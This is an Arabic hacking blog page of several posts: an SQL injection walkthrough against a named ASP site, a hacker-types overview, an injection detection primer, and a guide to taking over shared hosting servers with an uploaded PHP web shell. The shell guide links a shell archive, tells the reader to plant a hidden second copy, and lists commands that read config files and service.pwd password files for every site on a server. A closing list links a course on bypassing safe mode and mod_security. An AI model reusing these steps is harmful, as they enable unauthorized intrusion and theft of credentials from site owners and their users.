شرح إستغلآل ثغرات ASP

السلام عليكم ورحمة الله وبركاته

اليوم وبعد انقطاع عن المواضيع .. قررت اعمل لكم شرح عن استغلال ثغرات asp ..

هذه البرمجة نادرة الاستخدام الا فى المواقع الكبيرة مثل البنوك والشركات ..

ساشرح لكم كيفية استغلال خطأ sql تابع معى ..

انا ساشرج لكم على موقع www.haybersqlogretiyo.com

المنطقة المصابة بثغرة sql نضع بعد الرابط وبعد المتغير علامة " او '

www.haybersqlogretiyo.com/baskabibolum.asp?id=10"

يظهر لنا الخطأ التالى :

كود PHP:

Microsoft JET Database Engine error ’80040e14’ 

Syntax error in string in query expression ’id = 10";’. 

/baskabirbolum.asp, line 7 

الان نبدا نعد بالاعمدة للوصول الى العمود المطلوب

http://www.haybersqlogretiyo.com/bas...=10+order+by+1

الان عند الوصول الى العمود المصاب وهو 10

http://www.haybersqlogretiyo.com/bas...10+order+by+10

يظهر الخطأ التالى :

كود PHP:

Microsoft JET Database Engine error ’80040e14’ 

The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression. 

/news.asp, line 7 

ويكون العمود المصاب الرقم 8

http://www.haybersqlogretiyo.com/bas...=10+order+by+8

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7--

الان عند الوصول الى الرقم 7 يظهر لنا هذا الخطا وبداخله اسم القاعدة

كود PHP:

Microsoft JET Database Engine error ’80040e37’ 

The Microsoft Jet database engine cannot find the input table or query ’hayber’. Make sure it exists and that its name is spelled correctly. 

/baskabirbolum.asp, line 7 

واسمها : hayber

ويتم استغلالها .

http://www.haybersqlogretiyo.com/bas...+0,1,2,3,4,5,6, 7+from+hayber

والان نظهر اسم اليوزر والباس

Read More

تعريف عام للهاكر و انواعه

السلام عليكم اخوتى

البداية

و مع ظهور الإنترنت و انتشاره دولياً, أنتجت شركة IBM عام 1981م جهاز أسمته ( الكمبيوتر الشخصي) الذي يتميز بصغر حجمه و وزنه الخفيف بالمقارنة مع الكمبيوترات القديمة الضخمة, و أيضا سهولة استخدامه و نقله إلى أي مكان و في أي وقت, و استطاعته الاتصال بالإنترنت في أي وقت. عندها, بدأ الهاكرز عملهم الحقيقي بتعلم كيفية عمل هذه الأجهزة و كيفية برمجة أنظمة التشغيل فيها و كيفية تخريبها, ففي تلك الفترة ظهرت مجموعة منهم قامت بتخريب بعض أجهزة المؤسسات التجارية الموجودة في تلك الفترة. يوماً بعد يوم ظهرت جماعات كبيرة منافسة , تقوم بتخريب أجهزة الشركات و المؤسسات حتى بدأت هذه المجموعات الحرب فيما بينها في التسعينات من هذا القرن و انتهت بإلقاء القبض عليهم .

اولا تعريف عام للهاكر





الهاكر عموما كلمة تصف المختص المتمكن من مهارات في مجال الحاسوب وأمن المعلوماتية. والهاكر (بالإنجليزية: Hacker)

أساسا كلمة أطلقت على مجموعة من المبرمجين الأذكياء الذين كانوا يتحدوا الأنظمة المختلفة ويحاولوا اقتحامها، وليس بالضرورة أن تكون في نيتهم ارتكاب جريمة أو حتى جنحة، ولكن نجاحهم في الاختراق يعتبر نجاحا لقدراتهم ومهارتهم

إلا أن القانون اعتبرهم دخلاء تمكنوا من دخول مكان افتراضي لا يجب أن يكونوا فيه. والقيام بهذا عملية اختيارية يمتحن فيها المبرمج قدراته دون أن يعرف باسمه الحقيقي أو أن يعلن عن نفسه. ولكن بعضهم استغلها بصورة إجرامية تخريبية لمسح المعلومات والبعض الآخر استغلها تجاريا لأغراض التجسس والبعض لسرقة الأموال

تصنيف الهاكر أخلاقيا

* الهاكر ذو القبعة البيضاء (White hat hacker)، ويطلق على الهاكر المصلح.
*الهاكر ذو القبعة السوداء (Black hat hacker)، يطلق على الهاكر المفسد.
* الهاكر ذو القبعة الرمادية (Grey hat hacker)، المترنح بين الإصلاح والعبث.

أما اصطلاح القبعات فأصله مرتبط بتاريخ السينما وخصوصا أفلام رعاة البقر حيث كان الرجل الطيب يرتدي دائما قبعة بيضاء بينما يرتدي الرجل الشرير قبعة سوداء





الهاكر ذو القبعة البيضاء

الهاكر ذو القبعة البيضاء : هو مصطلح يطلق علي الهاكر الاخلاقي الذي يتعارض مع مفهوم اختراق انظمة الحواسيب و الاطلاع علي خصوصية الغير او انتهاك حقوق الملكية او حقوق النشر ويتركز علي حماية الانظمة واكتشاف ثغراتها واغلاقها او ايجاد حلول لها لحمايتها من الهاكر الاسود الذي يهدف الي اختراق الانظمة.

الهاكر ذو القبعة السوداء

الهاكر ذو القبعة السوداء : هو الهاكر الذي يقوم باختراق الانظمة وانتهاك حقوق الملكية او حقوق النشر او خصوصية الغير وفي فكره انه يجب ان تكون كل المعلومات مجانا وحرة و لاتثق بالسلطه وروج للامركزية والهكر يقدر بامكانيته لا بجنسه او لونه او ماله ولا قيود امامه.

الهاكر ذو القبعة الرمادية

الهاكر ذو القبعة الرمادية : هو مصطلح يطلق في مجتمع امن الحواسيب علي القرصان الذي يقوم باعمال قانونية احيانا او بمساعده امنية كما يملي عليه ضميره احيانا او باختراق موذ في احيان اخري انه باختصار عبرة عن مزيج من القرصان الابيض والقرصان الاسود القبعة لذا اختير له اللون الرمادي كلون وسط بين الابيض والاسود و في العادة لا يقوم هذا النوع من القراصنة بالاختراق لاغراض خبيثة او لمصلحة شخصية بل لزيادة خبرته في الاختراق واكتشاف الثغرات الامنية .

Crackers

مؤلفوا الفيروسات
يقوم هذا النوع من الهاكر بتصميم الفيروسات محبة في التخريب و تدمير الاجهزه و يعتبر المحللون النفسيون أن من ينتمي إلى هذا النوع من المبرمجين مصاب بمرض عقلي أو نفسي , يدفعه إلى هذه العمليات التخريبية التي لا يجني منها أي فائدة شخصية , ويعتبر هذا النوع من أخطر الانواع


ويوجد انواع اخرى


اشهر الهاكرز و الكراكر : اشهر الهاكر والكراكر التي سجلهم التاريخ :

Vladimir Levin: ذكي في الرياضيات وهذا أحد أهم أسباب اعتقاده بشهرته, تَخرّجَ مِنْ جامعةِ بيترسبيرغ تيخنولوجيتشيسكاي وكَانَ العقل المدبر وراء عصابةَ لصِّ الكومبيوتر الروسيةِ التي غَشّتْ حاسباتَ سيتيبانك إلى إعْطاء ال10$ مليون.

Johan Helsingius: معروف بإنشاء باعث الايميلات المشهور والمسمى بـ Penet.fi

Kevin Mitnick : اسم الشهرة له على الشبكة كان كوندور Condor. كمراهق لم يستطع أن يوفر لنفسه حاسوبه الخاص, إحدى الأشياء غير العادية عن ميتنيك أنه استعمل غرف المحادثة في الإنترنت لارسال رسائل لأصدقائه, تم الحكم عليه أول مرة بالسجن لمدة سنة في إصلاحية، كيفن من القراصنة الخالدين حيث اعتبر أول قرصان يكتب اسمه في لوائح الأف بي أي بين المجرمين الأكثر مطلوبين.

ومعلومات اكثر من ويكبيديا

كيفين ديفيد ميتنيك (بالإنجليزية: Kevin Mitnick‏) ولد في اوت 1963 وهو أحد أشهر مخترقي الأنظمة الذين تم سجنهم. تم اعتقاله من قبل مكتب التحقيقات الفدرالي الأمريكي FBI في 15 فبراير 1995. تم تجريمه بالتلاعب الإلكتروني واختراق أنظمة الحاسوب لدى كل من فوجيتسو وموتورولا ونوكيا وصن مايكروسيستمز. قضى ميتنيك خمسة سنوات في السجن (اربعة منها قبل المحاكمة)، 8 أشهر منها في الحبس الانفرادي، وتم إطلاق سراحه في 21 يناير 2000. وخلال فترة مراقبته بعد إطلاق سراحه، والتي إنتهت في 21 يناير 2003، منع من استخدام أي شكل من تكنولوجيا الاتصالات، باستثناء الهاتف الأرضي، مع بعض الاستثنائات. يرى المحققون الفيدراليون في أمريكا أن كيفين الملقب بالكوندور –نسر أمريكي - خطر لدرجة أنه قادر باتصال هاتفي واحد على وضع البلاد في حالة استنفار قصوى، استعداداً لحرب عالمية ثالثة، بفضل قدرته على اقتحام أخطر المواقع، عبر شبكات الكمبيوتر والهاتف!

Read More

ما هي ثغرة sql injection و كيف أتعرف على المواقع المصابة بها

تعريف SQL-injection :
هي تقنيه المستخدمة للاستفادة من الضعف اصدار عن اوامر الكترونيه عبر شبكة لتنفيذ التطبيق من قاعدة البيانات الخلفية ( SQL ) وطبعا المهاجمون يعملون علي الاستفادة الحقيقة من هذا الضعف للوصول الي المعلومات السريه الخاص بالموقع

نبداء شرح استغل SQL-injection عن طريق الخطاء
mysql_fecth_array()

مثل الموقع المستهدف
[****]
كود:
---------------------------------------------
http://www.site.com/index.php?id=1
---------------------------------------------

طبعا لإكتشاف الخطأ سنحاول ندخل رمز غير معروف في القاعده لحدوث الخطاء مثل

كود:
---------------------------------------------
'1
---------------------------------------------

ليكون الموقع بالشكل التالي

الكود :
--------------------------------------------------------
'http://www.site.com/index.php?id=1
--------------------------------------------------------

بعدين عند إدراج الرمز سيعطيك هذه الكتابة

الكود :
------------------------------------------------------------------------------------------------------
Warning: mysql_fecth_array(): supplied argument is not a valid MySQL result resource in
/home/site/index.php on line N
------------------------------------------------------------------------------------------------------

في نظركم ماذا يعني هذا ؟؟؟؟
يعتي أنه الموقع مصاب بثغرة sql injection

طبعا الحمد لله إنتهينا من مرحلة التعرف هل الموقع مصاب بهذه الثغرة

الأن ما هي طرق إستغلال هذه الثغرة ؟؟؟؟؟
هناك طريقتان لإستغلالها

الطريقة الأولى : عن طريق برنامج الشهير havij
الطريقة الثانية : عن طريق الحقن اليدوي

أنا الأن لا أستطيع أن أشرح الطريقتان لأني فعلت هذا الموضوع لكي أشرح ماهي ثغرة sql injection وطريقة تعرف هل الموقع مصاب بها
إنشاء الله في الشرح المقبل سأتطرق لشرح الطريقتان ولاكن فيديو إنشاء الله

و السلام عليكم و رحمة الله تعالى و بكاته

Read More

طريقة اختراق السيرفرات

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/download/phpshell.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وفي النهاية اتمنى انكم استفدتو من الدرس المبسط عن الاختراق عبر الشيل
وللذين يريدون نقل الموضوع يجب عليهم ذكر المصدر + الحقوق .. وشكرا

Read More

دورة إختراق المواقع والسيرفرات - الجزء الأول

   بسم الله الرحمن الرحيم

 

 

الدرس الأول : تعاريف هامة
http://www.gulfup.com/?b8LxeE

الدرس الثاني : شرح للشل c99
http://www.gulfup.com/?UcposC

الدرس الثالث : الصلاحيات
http://www.gulfup.com/?W3K1l1

الدرس الرابع : التصاريح
http://www.gulfup.com/?dsbmUy

الدرس الخامس : أوامر اللينكس
http://www.gulfup.com/?VHHkHm

الدرس السادس : تخطي صلاحيات اليوزر 1
http://www.gulfup.com/?ZnC558

الدرس السابع : تخطي صلاحيات اليوزر 2
http://www.gulfup.com/?BxNQHz

الدرس الثامن : تخطي صلاحيات اليوزر 3
http://www.gulfup.com/?6wo6R1

الدرس التاسع : تخطي صلاحيات اليوزر 4
http://www.gulfup.com/?hnaY8X

الدرس العاشر : تخطي السيف مود 1
http://www.gulfup.com/?8n5JoA

الدرس الحادي عشر : تخطي المود سكيورتي
http://www.gulfup.com/?RkZQbP

الدرس الثاني عشر : تخطى السيف مود 2
http://www.gulfup.com/?Y0Ju6P

الدرس الثالث عشر : تخطى السيف مود 3
http://www.gulfup.com/?nruMtZ

الدرس الرابع عشر : تخطى السيف مود 4
http://www.gulfup.com/?kQWDSj

الدرس الخامس عشر : تخطي مشاكل التنقل فى حالة صلاحية نوبادي (nobody)
http://www.gulfup.com/?Xp65js

الدرس السادس عشر : تخطي مشكلة Forbidden
http://www.gulfup.com/?YwnHs5

الدرس السابع عشر : تخطي مشلكة Internal Server Error
http://www.gulfup.com/?Cdn2nS

الدرس الثامن عشر : تخطي مشكلة Service Temporarily Unavailable
http://www.gulfup.com/?fZpDWD

الدرس التاسع عشر : تخطي مشكلة Not Acceptable
http://www.gulfup.com/?OnjI2W


بدون باس

HerCuLano

تحياتى

Read More